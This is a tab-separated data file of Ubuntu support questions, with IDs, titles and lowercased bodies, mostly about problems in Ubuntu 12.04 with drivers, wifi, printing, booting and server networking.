132275	why are n't 3d effects working ?	i 've just installed ubuntu 12.04 on my laptop . the live cd ran perfectly , with all 3d effects available . however , now that i have done a full installation , those effects are n't working . my graphic card is an nvidia gt252m and i 'm running the 64-bit version .
132276	configure gnome-terminal to start bash as a login shell , does n't read .bashrc	i 'm trying to integrate rvm with gnome-terminal . per default , gnome-terminal does not start bash as a login shell . i enabled run command as a login shell as suggested in this answer about the same topic setting up rvm , but when i do this the .bashrc file is not read . for example , i create an environment variable in .bashrc and then when i start a new gnome-terminal i can not read it . i need to run explicitly source .bashrc to read the file . is this the expected behavior ?
132285	add terminal session with network to login in screen	i want to add a terminal xsession to the log in drop down screen . can anyone let me know how to do this ? no desktop , load only terminal with network support . booting in recovering from grub lets me do this but i would rather do it from the login screen . my system is ubuntu 12.04 with standard install please note i have and am in the process of searching for the answer with little luck .
132289	booting problem with 12.04	i do have a 12.04 ubuntu on my notebook , but i do have a problem with it . i can not boot , if i dont press anything then there is a black screen , and it does not boot . if i press the space button , or any other key , for mutlitples times , like 20 or 25 times or more then it 's boot in seconds , and normally . how can i resolve this ? thanks ps : i do not have a problem with bios as it 's already booting on first for the hard drive
132290	i installed the oracle jdk manually but can not use it	i have downloaded jdk1.6.0_32.bin ( sun jdk ) from oracle file , and i installed it in /usr/lib/jvm . now when i try to compile a java source file using javac it says : the program 'javac ' can be found in the following packages : * openjdk-6-jdk * ecj * gcj-4.4-jdk * gcj-4.5-jdk try : sudo apt-get install < selected package > it means that it is not getting the path of my installed java . do i need to set a path ? how can i make it to work ?
132293	how do i configure a apc back-ups xs 1300 with apcupsd ?	how do i configure apcupsd to work with a back-ups xs 1300 ?
132297	how do priorities work on ubuntu 's 12.04 system monitor ?	i noticed in my system monitor app , on the `` processes '' tab , that one can change the 'priority ' of a certain program . what specifically would this do ? ( i 'm new )
132304	how to disable alt + ` ?	i ca n't find this shortcut , please help .
132311	installing ubuntu on acer aspire 5551-2450	i 'm trying to install ubuntu 12.04 on my acer aspire 5551-2450 laptop from a bootable usb drive . i have the usb drive all ready to go but when i boot into it - it just hangs on the install . all i see is syslink ... with the names of some people and a blinking cursor . i 'm not sure whats going . i tried 32 bit and it hang . so i tried the 64 bit and that also hangs . my win7 is currently running a 64 bit version . would trying it from a cd make any difference ? any suggestions will be appreciated . thanks a lot .
132317	slow wireless with an intel 4965	i just installed 12.04lts and the wifi became extremely slow . when i booted back to windows the wifi became normal again . this happened the first time when i upgraded 10.10 to 11.04 , so i stopped using ubuntu for a year , hoping this will be solved by 12.04 . of course it did n't , so i googled for the fix but nothing seems to work . i 've already tried the three methods in this site : http : //www.unixmen.com/resolve-slow-connexion-when-using-wifi-in-ubuntu-1104-natty-narwhal/ oh , i forgot to say that the internet was normal when i connected it to wired . but , i 'm still having issues with my wifi . hardware specs my computer model is asus m70sa and the wifi card is 802.11abgn+bt here is the whole list of them when i typed `` sudo lspci -nn '' into konsloe : 00:00.0 host bridge [ 0600 ] : intel corporation mobile pm965/gm965/gl960 memory controller hub [ 8086:2a00 ] ( rev 03 ) 00:01.0 pci bridge [ 0604 ] : intel corporation mobile pm965/gm965/gl960 pci express root port [ 8086:2a01 ] ( rev 03 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 [ 8086:2834 ] ( rev 03 ) 00:1a.1 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 [ 8086:2835 ] ( rev 03 ) 00:1a.7 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 [ 8086:283a ] ( rev 03 ) 00:1b.0 audio device [ 0403 ] : intel corporation 82801h ( ich8 family ) hd audio controller [ 8086:284b ] ( rev 03 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 82801h ( ich8 family ) pci express port 1 [ 8086:283f ] ( rev 03 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation 82801h ( ich8 family ) pci express port 3 [ 8086:2843 ] ( rev 03 ) 00:1c.3 pci bridge [ 0604 ] : intel corporation 82801h ( ich8 family ) pci express port 4 [ 8086:2845 ] ( rev 03 ) 00:1c.4 pci bridge [ 0604 ] : intel corporation 82801h ( ich8 family ) pci express port 5 [ 8086:2847 ] ( rev 03 ) 00:1c.5 pci bridge [ 0604 ] : intel corporation 82801h ( ich8 family ) pci express port 6 [ 8086:2849 ] ( rev 03 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 [ 8086:2830 ] ( rev 03 ) 00:1d.1 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 [ 8086:2831 ] ( rev 03 ) 00:1d.2 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 [ 8086:2832 ] ( rev 03 ) 00:1d.7 usb controller [ 0c03 ] : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 [ 8086:2836 ] ( rev 03 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev f3 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation 82801hm ( ich8m ) lpc interface controller [ 8086:2815 ] ( rev 03 ) 00:1f.1 ide interface [ 0101 ] : intel corporation 82801hm/hem ( ich8m/ich8m-e ) ide controller [ 8086:2850 ] ( rev 03 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ahci mode ] [ 8086:2829 ] ( rev 03 ) 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices [ amd ] nee ati rv635 [ mobility radeon hd 3650 ] [ 1002:9591 ] 01:00.1 audio device [ 0403 ] : advanced micro devices [ amd ] nee ati rv635 hdmi audio [ radeon hd 3600 series ] [ 1002 : aa20 ] 02:00.0 ethernet controller [ 0200 ] : marvell technology group ltd. 88e8055 pci-e gigabit ethernet controller [ 11ab:4363 ] ( rev 13 ) 06:00.0 sata controller [ 0106 ] : jmicron technology corp. jmb360 ahci controller [ 197b:2360 ] ( rev 02 ) 07:00.0 network controller [ 0280 ] : intel corporation pro/wireless 4965 ag or agn [ kedron ] network connection [ 8086:4229 ] ( rev 61 ) 08:01.0 firewire ( ieee 1394 ) [ 0c00 ] : ricoh co ltd r5c832 ieee 1394 controller [ 1180:0832 ] ( rev 05 ) 08:01.1 sd host controller [ 0805 ] : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter [ 1180:0822 ] ( rev 22 ) 08:01.2 system peripheral [ 0880 ] : ricoh co ltd r5c592 memory stick bus host adapter [ 1180:0592 ] ( rev 12 ) 08:01.3 system peripheral [ 0880 ] : ricoh co ltd xd-picture card controller [ 1180:0852 ] ( rev 12 ) update : may 12 , 2012 i just installed the madwifi-0.9.4-current driver for my atheros card , but after i rebooted , nothing appears to have been changed . also i have no idea how to configure the atheros card , or even if it was installed or not . update : may 13 , 2012 i just tried another solution in form : why is my internet so slow with an atheros wireless card ? it did speed up by connection just by a little bit , but i was still getting less than 15 % of my normal connection speed . update : may 17 , 2012 does anyone know why is causing this problem ? because , form what i 've heard , other distros are n't having this issue ( except linux mint , but it is based on ubuntu ) . could it be driver problem ? or some kind of incompatibility between the ubuntu 12.04 and the driver ? or the driver support is outdated ? other possibilities ? part 2 ok , so i went to the library and the wifi became normal . could it be a router problem/incompatibility ? internet provider ? i doubt it , because using wifi on windows was normal . update : may 18 , 2012 i do not know what happened , but somehow my wifi is fixed . does it have anything to do with the update just few hours ago ? well ... it did work for a bit , but returned to the unbearably-laggy-wifi about after 45mins .
132321	driconf for 12.04	i 'm having problems on 3d acceleration on ubuntu 12.04 that i had n't have before on 11.10 . i 've an intel hd graphics , what can i do ? ? i 've downloaded driconf , i used it on 11.10 and it worked great . but now not sure why it 's a bit buggy . does anyone know a good configuration for dri ? im getting also this error , [ 7.649228 ] intel ips 0000:00:1f.6 : failed to get i915 symbols but just for half a second on boot .
132329	what is the app , `` compiz '' responsible for on ubuntu 12.04 ?	when i open my system monitor and check the `` processes '' tab , i 've noticed that regardless of what other apps i have running , `` compiz '' is always taking roughly 10 % of my cpu . it might be a broad question , but what is compiz ? i understand it 's a window manager , but is it possible to use ubuntu without it ? is it a default application ?
132330	how do i get internet access in my kubuntu 12.04 virtual machine using nat and a wireless connection ?	i use virtualbox 4.1.14 directly from the developers including the extension ( not the ppa ) on an ubuntu 11.10 system . i try to access the internet from the kubuntu live cd that i have booted inside the vm . i think the external environments should n't play such a big role for the vm . i chose nat for adapter 1 , `` intel pro/1000 mt server ( 82545em ) '' as someone on the net recommended that . i tried it with dhcp within kubuntu . since kubuntu showed that it had no ip address , i also tried it manually and by executing dhclient manually . using these two ways , i got local ips , but i am not sure what the right settings for static ips for the virtual machine are . when i try to reach www.google.com in rekonq , the site is not available , although rekonq `` loads '' several seconds . i also tried to replace the dns server by the ip of my router/iad . even when i ping google 's ip from within the virtual machine , `` the destination host is unreachable '' .
132335	12.04 system always freezes	bueno , quisiera decirles que tengo varios problemas con ubuntu 12.04 , se me quedaba congelado todo excepto el mouse , si reproducía música esta se seguía escuchando pero la imagen seguía así mismo , congelada , incluso instalé fedora 16 y me sucedió lo mismo , se quedó congelado , al principio creí que era un problema de gnome shell , pero ahora me sucedió con unity y eso fue lo que me motivó a pedir ayuda , no sé que será , es extraño , antes tenía ubuntu 11.10 y me iba perfecto ( me sucedía el problema a veces , pero solo con gnome shell ) . también creí que era problema de chrome , ¡pero me sucedió con firefox ! creo que tengo mala suerte o algo , no había visto un tema similar de que se congelara todo excepto el mouse , incluso se cambia el cursor al modo de espera , de texto , etc ; pero lo demás , nada . translation via spanishdict i 've several problems with ubuntu 12.04 . everything gets frozen except the mouse , music continues to play but the image also gets frozen . i also tried fedora 16 but same problem . at first i thought it 's a problem of gnome shell , but now it 's happening with unity too . it 's strange because ubuntu 11.10 was working perfect ( i had problems some time , but only with gnome shell ) . i also thought may be it 's problem of chrome , but i 've firefox installed ! i 've not seen a similar problem that freezes everything except the mouse , even the cursor is changed to the mode of waiting , text etc . but otherwise nothing . how can i fix this problem ?
132338	how to programmatically log-in a user remotely	how do i programmatically and remotely ( using ssh ) log-in a user so that the lightdm login screen closes and loads the user 's desktop as thought they had physical typed in their username and password ? i have a vanilla ubuntu 12.04 desktop setup , and i 'd like to be able to start a desktop application remotely via ssh . i 've already accomplished this by specifying export display=:0 , however , the assumes there 's already an x-session running . edit : i do not mean vnc/rdp/nx . i mean literally logging in the physical terminal , but when you 're not at the physical terminal . imagine someone was sitting down in front of your physical linux computer , and you want to let them log-in , but you do n't want to give them your password . instead , you ssh into the box , and run a script to log them in and start a desktop session .
132344	ubuntu 12.04 desktop error : unknown command 'gfxmode ' . pressing any key continues	premise : linux noobie here , i have the same issue as op : fresh 12.04 desktop , changed grub with grub customizer , now i get a : unknown command 'gfxmode ' press ... etc was asked to `` re-post '' this question and link to this thread which i refer to above . i have tried what tarek said , and nothing seems to work , i find two lines with gfxmode : function gfxmode { gfxmode \ $ linux_gfx_mode note : not sure if it matter but in the error the two single quotes before gfxmode are not the same , the first is a slanted quote mark , the second ( after gfxmode ) is a straight one . i commented out the whole line , i tried to add 'set ' before gfxmode , neither did any difference . i found another place that said to remove the line from another file 40_custom , but i checked and those files do not contain anything relating to the line we are looking for : gfxmode $ linux_gfx_mode not sure what i am missing , but the file linux.save has recently appeared when searching for the line . not sure if its just a temp file of some kind . in any case i can not seem to get it , what am i missing ? thanks ! p.s . sorry for any messups in form : )
132347	gnome-classic language turned into chinese , how do i change it back to english ?	my newly installed ubuntu 12.04 gnome-classic just turned into chinese locale after reboot , how do i change it back to english ? i ca n't find any language menus , and the ones i opened are , well , in chinese ... when i open a terminal and execute gnome-language-selector , i get lots of this in the prompt : locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_collate to default locale : no such file or directory any ideas ? if i go to the language section in users , i only get the options in the picture .
132348	align windows with keyboard shortcuts ?	i 'm running 12.04 inside vmware workstation . windows 7 provides a very useful feature : use windows+left or windows+right to align the current window on the left/right half of the screen ( useful for terminal windows on wide-screen , etc ) . is there an equivalent available for ubuntu ? so far i was able to emulate windows+up ( maximize window ) , but ca n't find anything for left/right alignments . just to be clear : i am not talking about `` move to workspace '' or so , i 'm talking about resizing the current window on the current screen/workspace to only take the left/right half of the screen .
132353	brother hl-4150cdn prints text with wrong resolution on ubuntu 12.04 - where can i fix this ?	i have a really nasty problem when printing with ubuntu 12.04 x64 : text resolution is wrong ; bitmaps and vector graphics print perfectly at 2400 or 600 dpi , but text does not . it looks ugly , resolution feels really low . when using inkscape , turning texts into paths before printing solves the problem ( of course , this is not an interesting workaround for everyday use ) . the printer , a brother hl4150cdn , is used with cups , connected to ethernet port , and fails whatever network address ( lpd or ipp ) is configured in cups . i can print from anywhere ( firefox , inkscape , evince ) , it still fails with texts . printer test page outputs successfully . the problem depends on the font used : arial goes wrong , but nimbus roman feels right ( some fonts are probably subtitued by the printer ? ) , that is probably why courrier text whithin printer test page is correctly printed . i tried to reproduce this problem with previous versions of ubuntu without success . i tried fresh installs of ubuntu 11.10 and 12.04 desktop amd64 with updates , and with the brother driver : the problem is always there on 12.04 , never on 11.10 . the currently installed driver is the official brother driver with ppd files , and the ia32-libs dependancy : hl4150cdnlpr-1.1.1-5.i386.deb hl4150cdncupswrapper-1.1.1-5.i386.deb here is a scan of a really poor quality aliased text output with quality settings at 2400x600 dpi . grid lines are spaced 0,1 in ( printed from inkscape ) and i can count about 10 pixels between the lines , so the effective resolution is about 100 dpi : http : //imgur.com/y3pdd i captured data exchanged between computer and printer with wireshark , to compare the working version , with the buggy one . the headers are the same , but binary data are different ; screenshot using kdiff here : http : //imgur.com/ilatn this probably affects other printers . however , `` print to pdf '' and hp deskjet 920c are not affected by this . the questions are : how to investigate such a problem ? where can i find different settings explaining this terrible result when using ubuntu 12.04 , when comparing to 11.10 ? where to look at ? which files can i compare or edit to fix this kind of problem ? ps : could n't find a launchpad bug related to this problem ( will probably submit one ; but i am willing to investigate this , and learn btw )
132354	changed owner of /usr/bin	i did it ... i guess everyone does it sometime , but this was my first . i executed sudo chown -r /usr/bin and before i realized my mistake , it was too late ... now i ca n't access sudo because i receive the following error : sudo : must be setuid root . i would really appreciate if i could avoid a complete reinstall of ubuntu because that would require far too much work : ( here is the commands i 've tried without success ( in recovery mode ) : chown root : root /usr/bin/sudo chmod 4755 /usr/bin/sudo i 've also tried chmod 0440 /etc/sudoers all without success . any ideas about what i can try to fix it ? note : sorry for creating another one of these threads , but since i knew the exact command i executed to blow it all up , i thought that might make a difference : )
132355	do all apps start with a normal priority on the system monitor ?	i noticed that on my system monitor , one of my processes , titled pulseaudio , had a very high priority , while all of my other running apps had a normal priority . i do n't recall ever changing it , so it must have been its default priority , right ? are there any other apps like this ?
132358	unable to set my own icon for launcher item in 12.04	i use the faenza icon collection in ubuntu 12.04 unity with no issues . i decided to change my gimp launcher icon , so i made my own ( gimp-ak.png ) and added it , and its appropriately sized derivatives , to the faenza icon folders : /usr/share/icons/faenza/apps/16/gimp-ak.png /usr/share/icons/faenza/apps/22/gimp-ak.png /usr/share/icons/faenza/apps/24/gimp-ak.png /usr/share/icons/faenza/apps/32/gimp-ak.png /usr/share/icons/faenza/apps/48/gimp-ak.png /usr/share/icons/faenza/apps/64/gimp-ak.png /usr/share/icons/faenza/apps/96/gimp-ak.png /usr/share/icons/faenza/apps/scalable/gimp-ak.svg i then updated the icon field in /usr/share/applications/gimp.desktop from `` gimp '' to `` gimp-ak '' : [ desktop entry ] version=1.0 type=application name=gimp image editor genericname=image editor comment=create images and edit photographs exec=gimp-2.6 % u tryexec=gimp-2.6 icon=gimp-ak terminal=false categories=graphics ; 2dgraphics ; rastergraphics ; gtk ; x-gnome-bugzilla-bugzilla=gnome x-gnome-bugzilla-product=gimp x-gnome-bugzilla-component=general x-gnome-bugzilla-version=2.6.12 x-gnome-bugzilla-otherbinaries=gimp-2.6 startupnotify=true mimetype=application/postscript ; application/pdf ; image/bmp ; image/g3fax ; image/gif ; image/x- $ x-ubuntu-gettext-domain=gimp20 after logging off ( and even restarting ) , my custom icon does not show up - gimp has the default gear icon : setting the icon field in gimp.desktop to any other icon in the faenza collection works fine . what do i need to do to get my custom icon to show up properly ?
132363	application to connect phone to pc and call other phones	here is my dilemma . i will be building a local website that one of the things it will do is connect to a cellphone on the pc is run on and send a message to a client . the website part is not really the problem as much as a ubuntu tool that can do the following which will greatly help me in making the software at the end : connect a phone to the ubuntu pc have access to the phone so i can make calls from the pc using the phone or even send sms . send a prerecorded message to the phone so it could call a client and tell them the prerecorded message . supports console line input . is there a software that can help me with this . it does not matter the phone since is has n't been bought yet so it would depend on which type of phone is more compatible and then it will be bought . but basically is : ubuntu client system - > phone connected to pc - > call/sms to client via phone to phone
132372	installed 12.04 via wubi , now monitor problems	had to revive an old desk top because my oldest dumped sprite on our laptop . ouch ! anyway , i installed 12.04 on this vista machine ( e-machines , amd athlon ) . the install went fine , when i rebooted and selected ubuntu it appears the graphics card drops out as the monitor shows a message `` out of range '' if i 'm not mistaken . maybe the ubuntu install does n't recognize the nvidia graphics card ? how can i fix this ? thanks , brian
132374	ubuntu 12.04 does not see hard drive on dell precision 470	im trying to install ubuntu 12.04 on a dell precision 470 with no success . i boot off of the live cd and click install , but the installer doesnt see a hard drive . i read this article , but there are no settings in my bios to change sata operation mode . any ideas ?
132375	courier wo n't start because /usr/sbin/pop3d does n't exist	my courier-pop and courier-imap servers wo n't start . i 'm using an old ubuntu 6.06 box . i did an apt-get update and apt-get upgrade 2 days ago , which may have messed things up ( there were a few errors ) . in any case , /usr/sbin/pop3d no longer exists . this is a file that the courier-pop startup script calls . i always back-up the machine fully before doing an update and when i extracted the backup to see if i could restore that file from there , the backed-up-copy is present but it has 0 file size and no permissions . i 'm stuck . i did n't realize an update / upgrade could corrupt things .
132376	ubuntu 12.04 gnome classic problem - multiple top and bottom bars	i 'm using ubuntu 12.04 , with gnome classic . i was using it with no problem . then after i logged in once i saw 4 bars at the top of the screen and 4 at the bottom instead of 1 . how can i fix it ? i tried removing and reinstalling gnome-panel . but it did n't work .
132381	xubuntu no wubildr error	i downloaded xubuntu trough the wubi installer on windows 7 and it worked just fine , but when i choose xubuntu at the boot menu i get the no wubildr error and then it just continues and i log on just fine ... so far it has n't effected xubuntu much and i am able to continue using it , but seeing the error everytime is a bit annoying , how do i fix it ? i 've tried tons of thing 's ive tried replacing the wubildr files with the one 's in the winboot folder , and uninstalling/reinstalling , but nothing works . i 've checked tons of other websites and forums and the likes and havent found anything that will fix it .
132383	ubuntu server on lan but ca n't get to internet when other pc 's can	i have spent over 32 hours tyring to solve this problem . my ubuntu 10.04.4 server has postfix/dovecot etc and has been running fine up until 5/3/2012 . my symptoms are i can ssh to the server locally , i can ping it etc . but it does not get to internet or the internet to it . i have gone through several pages on this site as well as others . here are some pertinent files , i am sure you will want more and i will get to you . # the primary network interface auto eth0 iface eth0 inet static address 192.168.xxx.xxx netmask 255.255.255.0 network 192.168.0.0 broadcast 192.168.0.255 gateway 192.168.xxx.xxx # pubilc ip network interface auto eth0:0 iface eth0:0 inet static name ethernet public ip card address 65.15.xxx.xxx netmask 255.255.255.240 broadcast 65.15.xxx.xxx network 65.15.xxx.xxx $ host www.gtlib.gatech.edu www.gtlib.gatech.edu has address 128.61.111.13 www.gtlib.gatech.edu has address 128.61.111.11 www.gtlib.gatech.edu has address 128.61.111.10 www.gtlib.gatech.edu has ipv6 address 2610:148:1f00:6f00:21b:24ff : fe1d : e940 www.gtlib.gatech.edu has ipv6 address 2610:148:1f00:6f00:20c:29ff : fe3c:63a8 www.gtlib.gatech.edu has ipv6 address 2610:148:1f00:6f00:216:36ff : fee9:2178 $ ping 128.61.111.13 ping 128.61.111.13 ( 128.61.111.13 ) 56 ( 84 ) bytes of data . it timed out . when i do a apt-get or a wget it times out . $ route kernel ip routing table destination gateway genmask flags metric ref use iface 65.15.xxx.xxx * 255.255.255.240 u 0 0 0 eth0 192.168.0.0 * 255.255.255.0 u 0 0 0 eth0 default towerysxxx.towe 0.0.0.0 ug 100 0 0 eth0 please let me know what else i can provide .
132384	i installed ubuntu 11.10 , and it took over my number 2 drive d : which was a music directory	c : drive has xp pro 32 bit . i made one 65gb partition on c : which was named l : drive . i was hoping to install ubuntu on the partition , but i made mistakes and lost all of d : drive and ubuntu also grabbed l : drive . i want to first see if i can recover as much of my music as possible . and then uninstall ubuntu from the d : and re-install it to the l : partition on c : drive . i need help with all of the questions i have typed . i know nothing about ubuntu , that is why i was trying to install it . can i do any of the questions i have asked . rod
132387	how to create a bookmark under `` computer '' in the sidebar of the nautilus file manager in 12.04 ?	somehow , i removed the downloads bookmark in the sidebar under `` computer '' . is there any way i can make a new one ? possibly with the same icon ? i still have my downloads directory . i just do n't have the bookmark under `` computer '' anymore , and it has the ordinary folder icon . i know it 's not the most significant question , but it 's a question nonetheless . also , i 'm not sure , but it may be important to note that i 'm using unity 2d .
132389	how do i enable and disable the unity 3d launcher 's auto hide setting with the terminal ? ( 12.04 )	question says it all . i 'm looking to make quick toggling icon basically .
132391	how can i get mupen64 and my game saves on 12.04 ?	i recently upgraded from 11.10 to 12.04 , and i had a bunch of game progresses saved from my mupen64 emulator . i kept my roms , so i figure i kept my saves as well , but i ca n't find mupen64 in the repository , and when i tried downloading it online , it crashed and would n't load again . is there another version of the emulator i can get ? or another emulator which will read my game saves from mupen ?
132392	failing to boot after ''succesfully '' restoring from deja dup backup	before upgrading to 12.04 , i completely backed up 11.10 oneiric with deja-dup . in 12.04 i had major nvidia-related problems , so i decided to roll back to 11.10 . i tried to restore from the backup and at first failed several times with `` an uknown error occured '' . i reformated my hard drive , installed a fresh copy of 11.10 on the hard drive , and tried the restore again , with no success . i then booted from a live usb and ran the restore again after mounting the file system . i chose the restore location to be `` file system '' and the restore completed successfully , or so it said . after restarting my pc , all i got was a 'no operating system ' error . i remounted my partition chrooted and installed the kernel . i am working now but my question concerns the restore . why did n't the restore worked ? i 'm hoping someone has thought of something that i have not .
132395	creating a new user after install with encrypted home	just trying to set up a secondary user after install on 12.04 . my last system was 10.04 and it allowed me to create a new user with an encrypted home partition but when creating a new user on 12.04 there is no option to encrypt home partition . do i need to install another package or am i missing something ?
132399	wifi does n't work since 11.10 thought it would be fixed on 12.04	my wireless adapter is rtl8191sevb . the driver which has been working was the rtl819xse , but when i upgraded to 11.10 , it just stopped working and nothing changed after upgrading to 12.04 . i really do n't know if that 's a problem with ubuntu or with the kernel . does someone know how to fix it ?
132406	in what directory ( s ) are the default ubuntu icons located ?	i accidentally deleted the downloads bookmark , and i wanted to recreate it with the same icon , but i ca n't find it .
132411	how can i configure juju for deployment on openstack ?	i would like to test juju charms on trystack.org , however i have not found any docu , how to configure juju for the openstack api ?
132413	printer not visible over network between 12.04 machines , printer properties reports `` not published . see server settings ''	i 'm attempting to share a usb attached printer connected to one 12.04 machine to another 12.04 machine ( and a 10.04 machine ) on the same network . the printer does not show up and can not be found as a network printer by the second machine . on the first machine , i have `` shared '' , `` enabled '' , and `` accepting jobs '' selected in printer properties , with `` access control '' set to allow printing for everyone and a right click on the printer has `` shared '' selected . however printer properties shows a message `` not published . see server settings. '' . i do n't know what settings it is referring to . note if relevant the print server in this case was installed as a 12.04 beta and then upgraded when 12.04 was released .
132419	how to autostart a .sh after login ?	i have made a .sh ( which works ) to run a mono program . how do i make it run every time i login ? ( and display in a terminal , not just run in background ) ubuntu server 12.04 with unity desktop .
132422	having ram problems , i need a error check program	lately i 've been having a lot of glitches with my computer , and i 'm really suspicious about my ram . i need a program compatible with ubuntu 12.4 lts that will be able to check my ram . also i 've tried the memtest86 boot-up program but did n't really understand it , or how it works .
132426	weird port 9000 service , how do i find out what it is ?	root @ server : ~ # sudo netstat -tlnp active internet connections ( only servers ) proto recv-q send-q local address foreign address state pid/program name tcp 0 0 0.0.0.0:8080 0.0.0.0 : * listen 1548/nginx tcp 0 0 0.0.0.0:80 0.0.0.0 : * listen 1370/varnishd tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen 1235/sshd tcp 0 0 127.0.0.1:25 0.0.0.0 : * listen 1421/sendmail : mta : tcp 0 0 127.0.0.1:6082 0.0.0.0 : * listen 1349/varnishd tcp 0 0 127.0.0.1:9000 0.0.0.0 : * listen 1301/main.conf ) tcp 0 0 127.0.0.1:3306 0.0.0.0 : * listen 1226/mysqld tcp 0 0 127.0.0.1:587 0.0.0.0 : * listen 1421/sendmail : mta : tcp 0 0 127.0.0.1:11211 0.0.0.0 : * listen 1263/memcached tcp6 0 0 : ::8080 : : : * listen 1548/nginx tcp6 0 0 : ::80 : : : * listen 1370/varnishd tcp6 0 0 : ::22 : : : * listen 1235/sshd tcp6 0 0 : :1:6082 : : : * listen 1349/varnishd it closes with `` main.conf ) '' i am a newbe so obviously screwed up somewhere in the configuration file , just not sure it was . any help ?
132427	for what wine does not it work well with ubuntu 12.04 ?	i alone use wine for 2 things , to use ares and to use games , when it had ubuntu 11.10 of 32 bits it was using `` call of duty 4 modern warfare `` , to traverse it did not have any problem , but when i started using ubuntu 12.04 lts of 64 bits it started spending something strange when it was playing , in a mission of nothing there go out many lines of different colors , points of red color , balls of gray color that are deformed , you illuminate many on the screen when there is fire or smoke , nothing of it was happening to myself when it had ubuntu 11.10 , the version of wine is 1.4 , what must i do in order that i worked like before ?
132428	disk utility in 12.04 lts will not let me check the file system partition for errors	i want to check my partition for errors using disk utility . when i press the `` check filesystem '' button , it says that an error occurred ... device is busy . how can i ignore that error and carry on with the check ? i have ubuntu 12.04 lts .
132431	rhythmbox import error in 12.04	rhythmbox is not able to install the mpeg-4 plugin when i import mp4 files into it . it identifies the plugin ( gstreamer ) , but fails to install it citing package dependency errors as following : the following packages have unmet dependencies : gstreamer0.10-ffmpeg : depends : libavcodec-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.1ubuntu1 is to be installed depends : libavformat-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.1ubuntu1 is to be installed depends : libavutil-extra-51 ( > = 4:0.7.3-1 ) but 4:0.8.1ubuntu1 is to be installed depends : libc6 ( > = 2.7 ) but 2.15-0ubuntu10 is to be installed depends : libglib2.0-0 ( > = 2.31.2 ) but 2.32.1-0ubuntu2 is to be installed depends : libgstreamer-plugins-base0.10-0 ( > = 0.10.31 ) but 0.10.36-1 is to be installed depends : libgstreamer0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu1 is to be installed depends : liborc-0.4-0 ( > = 1:0.4.16 ) but 1:0.4.16-1ubuntu2 is to be installed depends : libpostproc-extra-52 ( > = 4:0.7.3-1 ) but 4:0.8.1ubuntu1 is to be installed depends : libswscale-extra-2 ( > = 4:0.7.3-1 ) but 4:0.8.1ubuntu1 is to be installed gstreamer0.10-ffmpeg : i386 : depends : libavcodec-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.1ubuntu1 is to be installed depends : libavformat-extra-53 ( > = 4:0.7.3-1 ) but 4:0.8.1ubuntu1 is to be installed depends : libavutil-extra-51 ( > = 4:0.7.3-1 ) but 4:0.8.1ubuntu1 is to be installed depends : libc6 ( > = 2.7 ) but 2.15-0ubuntu10 is to be installed depends : libglib2.0-0 ( > = 2.31.2 ) but 2.32.1-0ubuntu2 is to be installed depends : libgstreamer-plugins-base0.10-0 ( > = 0.10.31 ) but 0.10.36-1 is to be installed depends : libgstreamer0.10-0 ( > = 0.10.31 ) but 0.10.36-1ubuntu1 is to be installed depends : liborc-0.4-0 ( > = 1:0.4.16 ) but 1:0.4.16-1ubuntu2 is to be installed depends : libpostproc-extra-52 ( > = 4:0.7.3-1 ) but 4:0.8.1ubuntu1 is to be installed depends : libswscale-extra-2 ( > = 4:0.7.3-1 ) but 4:0.8.1ubuntu1 is to be installed
132433	how can i see the gpu temperture of my ati graphics card ?	i trying to work out how long can my graphics card last with its fan off without overheating . when i 'm browsing the internet , the graphics card fan is the loudest thing in my computer . so my question is , how do i monitor the gpu temperature of my ati radeon hd 4850 graphics card .
132440	headphone jack not working ?	i have a dell studio xps 1647 and headphones do not work ( though , internal speakers work like a charm ) , i have dual boot windows 7 and headphones work perfectly fine ... i also tried -adding in options snd-hda-intel model=eapd probe_mask=1 position_fix=1 . i 've experienced this with oneric ocelot and the latest precise pangolin ( lts ) .
132441	upgraded - now network not connected	recent convert to ubuntu after teaching comp sci using windows . two machines connecting through adsl modem . just upgraded the toshiba a100 laptop to 12.04 and now it says network not connected . my guess would be laptop drivers but i do n't know how to diagnose or find/install such drivers .
132442	i get this error mail every time i login to my web server , what does it mean ?	message 1 : from root @ server.myserver.net wed may 2 03:01:02 2012 date : wed , 2 may 2012 03:01:02 +0400 from : root @ server.myserver.net ( cron daemon ) to : root @ server.myserver.net subject : cron < root @ server > test -x /usr/sbin/anacron || ( cd / & & run-parts -- report /etc/cron.daily ) content-type : text/plain ; charset=ansi_x3.4-1968 x-cron-env : < shell=/bin/sh > x-cron-env : < path=/usr/local/sbin : /usr/local/bin : /sbin : /bin : /usr/sbin : /usr/bin > x-cron-env : < home=/root > x-cron-env : < logname=root > /etc/cron.daily/logrotate : head : can not open `status ' for reading : no such file or directory sed : ca n't read status : no such file or directory and how do i fix it ?
